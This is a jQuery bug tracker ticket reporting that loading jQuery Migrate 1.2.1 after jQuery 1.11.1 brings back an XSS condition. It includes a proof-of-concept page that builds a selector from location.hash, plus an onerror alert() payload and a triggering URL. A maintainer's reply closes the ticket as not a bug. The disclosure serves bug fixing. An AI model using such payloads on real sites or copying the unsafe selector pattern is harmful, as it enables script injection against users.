Opened 6 years ago
Closed 5 years ago
#15226 closed bug (notabug)
Invalidating issue #9521
| Reported by: | 11paths | Owned by: | |
|---|---|---|---|
| Priority: | low | Milestone: | None |
| Component: | unfiled | Version: | 1.11.1 |
| Keywords: | Cc: | ||
| Blocked by: | Blocking: |
Description
When including "jquery migrate" library after jquery (in that particular order) you get to invalidate issue #9521, creating a XSS condition.
<html><head>
<script src='http://code.jquery.com/jquery-1.11.1.js'></script>
<script src='http://code.jquery.com/jquery-migrate-1.2.1.js'></script>
</head><body><a href="" ></a><script>
$('a[href="' + window.location.hash + '"]');
</script></body></html>
When passing a selector plus an item as a parameter:
$('a[href="<img src=a onerror=alert()>"]');
And then calling.
http://localhost/test.html#<img src=a onerror=alert()>
Would trigger the XSS condition.
Note: See
TracTickets for help on using
tickets.
Yes, jQuery Migrate restores the old "looks like HTML" rules because if it doesn't it breaks code. Any page that injects untrusted content into the page has a bug in their own code. By definition, jQuery allows developers to inject HTML and scripts into their pages so the developer needs to know what they are injecting. There is discussion here: https://github.com/jquery/jquery-migrate/issues/36